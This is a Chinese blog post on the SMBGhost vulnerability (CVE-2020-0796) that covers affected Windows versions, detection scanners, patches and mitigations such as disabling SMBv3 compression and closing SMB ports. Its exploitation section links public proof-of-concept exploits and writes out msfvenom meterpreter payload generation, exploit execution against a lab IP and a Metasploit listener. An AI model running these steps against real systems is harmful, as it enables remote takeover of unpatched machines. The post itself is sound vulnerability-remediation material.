SMB漏洞修复

已于 2024-03-11 15:52:02 修改
阅读量873 收藏 10
点赞数 25
分类专栏: Windows服务安全配置 文章标签: 服务器 全文检索 windows 网络
于 2024-03-11 15:09:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lopowh/article/details/136624573
版权

通告背景

2020311日,某国外安全公司发布了一个近期微软安全补丁包所涉及漏洞的综述,其中谈到了一个威胁等级被标记为CriticalSMB服务远程代码执行漏洞(CVE-2020-0796),攻击者可以利用此漏洞远程无需用户验证通过发送构造特殊的恶意数据导致在目标系统上执行恶意代码,从而获取机器的完全控制。此漏洞主要影响支持SMBv3.0的设备,理论上存在蠕虫化的可能性。

漏洞描述

漏洞存在于WindowsSMBv3.0(文件共享与打印服务)中,目前技术细节暂不公布,对于漏洞的利用无需用户验证,通过构造恶意请求即可触发导致任意代码执行,系统受到非授权控制。

影响面评估

此漏洞主要影响SMBv3.0协议,目前支持该协议的设备包括Windows 8Windows 8.1Windows 10Windows Server 2012  Windows Server 2016,但是从微软的通告来看受影响目标主要是Win10系统,考虑到相关设备的数量级,潜在威胁较大。

受影响的Windows操作系统版本

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)

漏洞检测篇

git 脚本检测:

GitHub - ly4k/SMBGhost: Scanner for CVE-2020-0796 - SMBv3 RCE
检测返回的数据包中SMB压缩版本,这种检测方式打过补丁依然会误报。

python scanner.py <IP>

奇安信检测工具:

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
适用于局域网批量检测,快速查找未打补丁的机器。

腾讯电脑管家SMB漏洞修复工具:

http://dlied6.qq.com/invc/QQPatch/QuickFix_SMB0796.exe
适用于个人用户检测,一键快速检测和修复。

漏洞利用篇

蓝屏PoC

GitHub - eerykitty/CVE-2020-0796-PoC: PoC for triggering buffer overflow via CVE-2020-0796

使用两台虚拟机作为漏洞演示,一台win10 1903版本,一台是Kali Linux

python3 CVE-2020-0796.py <IP>

本地提权PoC

GitHub - danigargu/CVE-2020-0796: CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost
本地普通用户Bypass执行提权exp后弹出cmd窗口,成功获取system权限。

远程利用PoC

GitHub - chompie1337/SMBGhost_RCE_PoC

漏洞演示过程:

1、使用msfvenom生成payload

msfvenom  -p windows/x64/meterpreter/bind_tcp  lport=1234 -f py -o evil.py

2、将evil.py 生成的code,替换到exploit.pyUSER_PAYLOAD参数,并把参数buf改为USER_PAYLOAD

root@kali:~# git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git

3、运行exploit.py

python3 exploit.py -ip 192.168.172.128

4、启动msf监听本地端口(PS:监听端口如果一直收不到shell,可重新运行一次。)

msf5 > use exploit/multi/handler

修复方法

1. 补丁

微软已经发布了此漏洞的安全补丁,访问如下链接:
Security Update Guide - Microsoft Security Response Center

方法一:给对应的系统打微软出的最新补丁

系统类型

介绍

下载链接

Windows 10 Version 1903 for 32-bit Systems

KB4551762介绍

下载

Windows 10 Version 1903 for ARM64-based Systems

KB4551762介绍

下载

Windows 10 Version 1903 for x64-based Systems

KB4551762介绍

下载

Windows 10 Version 1909 for 32-bit Systems

KB4551762介绍

下载

Windows 10 Version 1909 for ARM64-based Systems

KB4551762介绍

下载

Windows 10 Version 1909 for x64-based Systems

KB4551762介绍

下载

Windows Server, version 1903 (Server Core installation)

KB4551762介绍

下载

Windows Server, version 1909 (Server Core installation)

KB4551762介绍

下载

2. 临时解决方案

如果暂时无法安装补丁,微软当前建议按如下临时解决方案处理:

方法二:禁用SMBv3压缩
禁用SMB 3.0的压缩功能,是否使用需要结合自己业务进行判断。
使用以下PowerShell命令禁用压缩功能,以阻止未经身份验证的攻击者利用SMBv3 服务器的漏洞。
Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” DisableCompression -Type DWORD -Value 1 -Force
用户可通过以下PowerShell命令撤销禁用压缩功能
Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” DisableCompression -Type DWORD -Value 0 -Force
注:利用以上命令进行更改后,无需重启即可生效;该方法仅可用来防护针对SMB服务器(SMB SERVER)的攻击,无法对SMB客户端(SMB Client)进行防护。

方法三:设置防火墙策略关闭相关端口
SMBTCP 445端口
NetBIOS名称解析的UDP 137端口
NetBIOS数据图服务的UDP 138端口
NetBIOS会话服务的TCP 139端口

方法四:通过IP安全策略屏蔽危险端口,bat执行添加防火墙策略,关闭危险服务
您浏览的页面不存在,请检查页面地址是否正确!

修复

微软目前给出变通方法:禁用SMBv3的压缩功能或在防火墙禁止445端口

PowerShell禁用SMBv3压缩功能:

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force

PowerShell重新启用SMBv3压缩功能:

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 0 -Force

网络异常吗
关注
  • 25
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SMBv3漏洞检查.bat
09-29
通过批处理对计算机进行SMBv3漏洞补丁的扫描。
Win2008 蓝屏漏洞揭秘
01-10
9月初,在各大安全网站上登载了一个Windows操作系统的蓝屏漏洞的消息,这个漏洞的出现如同一颗石子,打破了近半年来Windows没有爆出重大漏洞的沉寂。   蓝屏漏洞威胁的是服务器操作系统Windows Server 2008,这意味着如果Windows Server 2008蓝屏,将导致服务器停止服务……目前,漏洞的利用代码还限制在小范围内,不过漏洞攻击工具却已经研制出来了,现在为大家揭秘蓝屏漏洞的利用过程。   问题: Windows Server 2008蓝屏漏洞   危害: 服务器出现蓝屏停止服务   危机:服务器的蓝屏隐痛   我是安天实验室的苗得雨,我下面给大家说的就是蓝屏漏洞
微软SMBLoris漏洞一键修复工具.zip
09-03
软件介绍: SMBLoris包含许多的漏洞,包括远程执行代码和拒绝服务漏洞,目前SMBV1已经被SMBV2和SMBV3代替。程序运行后将自动检测你的计算机是否存在SMBBloris漏洞,点击立即修复即可自动进行处理。修复后需要重新启动计算才能生效。
445端口服务禁用恢复工具(打补丁后使用)勒索蠕虫漏洞修复
08-02
445端口服务禁用恢复工具(打补丁后使用)是一款关于445端口被禁用后的开启方法工具注册,对于目前不支持自动打补丁的操作系统,可以按照工具提示关闭风险服务(关闭445端口,禁用smb协议,会导致打印业务、文件共享业务受到影响) ;等手动安装完补丁后,通过服务恢复工具恢复被关闭的服务。 使用说明 1. 使用nsascan工具禁用445的,恢复方法是: SMB协议: HKEY_LOCAL_MA
需要SMB签名的漏洞解决方案
spring_is_coming的博客
10-21 2193
SMB签名漏洞
方程式Windows SMB利用
05-04
方程式利用
XP SMB服务漏洞MS17-010 勒索病毒(WannaCry UIWIX)补丁
05-18
windows XP三种语言(简体 ,繁体和英文)的漏洞补丁,专门针对目前流行的勒索病毒(WannaCry UIWIX),修复windows系统的 SMB服务漏洞MS17-010
方程式工具-永恒之蓝 Windows 2008 r2 安装补丁
04-12
【1】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0143)(方程式工具-永恒之蓝)[原理扫描] 【2】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0144)(方程式工具-永恒之蓝)[原理扫描] 【3】Microsoft Windows SMB...
Linux环境下Samba远程代码执行漏洞探析.pdf
09-06
为了防范 Samba 远程代码执行漏洞,需要尽量减少 Samba 服务器的权限,避免使用 root 用户启动 Samba 服务,并且需要及时更新 Samba 软件,修复已知的漏洞。 Samba 远程代码执行漏洞是一种非常危险的漏洞,需要引起...
360永恒之蓝ms17010补丁官方免费版
07-25
360永恒之蓝ms17010补丁是针对全球永恒之蓝勒索病毒的最新补丁,由360官方最新权威发布,安装ms...近期,国外黑客利用俄罗斯影子经纪人曝光的美国国家安全局(NSA)若干利用smb协议(445端口) 漏洞而制作的勒索软件,
服务器主机加固PPT.pdf
06-25
紧急修复盘(ERD)更新时的安全漏洞。 ERD更新时,整个SAM被复制到相应的文件,在缺省的 权限设置下,每个人对该文件具有读的访问权。 服务器消息块(SMB)文件传输授权机制的安全漏洞SMB协议允许远程访问共享...
NSE-scripts:NSE脚本可检测CVE-2020-1350 SIGRED和CVE-2020-0796 SMBGHOST,CVE-2021-21972
05-08
注意:该脚本只是安全地检查SMBv3上的CVE-2020-0796漏洞,并且不会尝试执行任何其他操作。 安装和运行 将.nse文件复制到nmap / scripts /文件夹并运行更新 cp cve-2020-0796.nse /usr/share/nmap/scripts/ nmap --...
Real-timeDetectionAD_ver2
05-31
利用 MS14-068 和 MS17-010 中修复漏洞进行攻击 使用金票的攻击 使用 Silver Ticket 进行攻击 该工具在 Windows 2008 R2、2012 R2、2016 中进行了测试。 工具细节 工具的功能 我们的工具由以下组件组成: 检测...
cmd操作命令和linux命令大全收集
04-24
CMD命令:开始->运行->键入cmd或command(在命令行里可以看到系统版本、文件系统版本) 命令大全 1. gpedit.msc-----组策略 2. sndrec32-------录音机 3. Nslookup-------IP地址侦测器 ,是一个 监测网络中 DNS...
linux smb 漏洞_Samba SMB1报文链接远程内存破坏漏洞(CVE-2010-2063)
weixin_36073895的博客
12-23 389
Samba是一套实现SMB(Server Messages Block)协议、跨平台进行文件共享和打印共享服务的程序。Samba的process.c文件中chain_reply函数处理链接SMB1报文时没有正确地验证客户端所提供的输入字段,恶意客户端可以向Samba服务器发送特制的SMB报文触发堆内存破坏,导致以Samba服务器(smbd)的权限执行任意代码。利用这个漏洞无需认证,且samba的默...
smb+服务器+修复,关于SMBv3.0服务远程代码执行漏洞的风险提示及修复方法
weixin_34378986的博客
08-05 1721
一、漏洞概述2020年3月10日,微软官方发布了针对Windows 10/Server禁用SMBv3(SMB 3.1.1版本)协议压缩的指南公告,以此缓解SMBv3协议(用于文件共享与打印服务)在处理调用请求时的一个远程代码执行漏洞(漏洞编号CVE-2020-0796)。SMBv3协议同时启用于SMB服务端和SMB客户端,未经身份验证的攻击者可以对服务端和客户端分别进行攻击,通过向受影响的SMBv...
linux smb 漏洞_Linux 系统中这样修复 SambaCry 漏洞 ...
weixin_39628271的博客
12-23 514
漏洞过时和未修补的系统容易受到远程代码执行漏洞的攻击。简单来说,这意味着访问可写共享的人可以上传一段任意代码,并使用服务器中的 root 权限执行该代码。这个问题在 Samba 网站上被描述为 CVE-2017-7494,并且已知会影响 Samba v3.5(2010 年 3 月初发布)及以后版本。由于与 WannaCry 有相似之处,它被非官方地被命名为 SambaCry:它们均针对 SMB ...
win7永恒之蓝漏洞修复方案
afjkslahdfkaJDHU的博客
12-12 4283
1、为计算机安装最新的安全补丁,网址为Microsoft 安全公告 MS17-010 - 严重 | Microsoft Docs。 2.开启防火墙 打开控制面板,点击系统和安全,找到防火墙,打开防火墙 3.关闭445端口 WIN+R 运行--regedit 找到注册表项“HKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parameters” 选择“Parameters”项,右键单击,选择“新建”——“DWORD值”。(64位..
windows server升级smb
最新发布
07-11
您好!要在Windows Server上升级SMB(Server Message Block),您可以按照以下步骤操作: 1. 确保您已经备份了重要的数据和设置,以防意外发生。 2. 确认您的Windows Server版本。SMB的最新版本是SMB 3.1.1,但不是所有版本的Windows Server都支持该版本。您可以在微软官方文档中查看各个Windows Server版本与SMB版本的兼容性。 3. 下载和安装最新的Windows更新。微软定期发布更新来修复漏洞和改进SMB的性能和安全性。打开Windows Update,检查是否有可用的更新,并安装它们。 4. 更新网络适配器驱动程序。访问计算机制造商的网站,下载并安装最新的网络适配器驱动程序。这将确保您的网络适配器与SMB的最新版本兼容,并提供更好的性能和稳定性。 5. 启用SMB 3.0或更高版本。打开“控制面板”,选择“程序”,然后选择“打开或关闭Windows功能”。在“文件和打印机共享”部分,确保选中了“SMB 3.0/CIFS 文件共享支持”选项。保存更改并重新启动服务器。 请注意,升级SMB可能会影响到您的网络环境和其他相关配置,因此在进行升级之前,请确保您已经进行了充分的测试,并在生产环境中小心操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值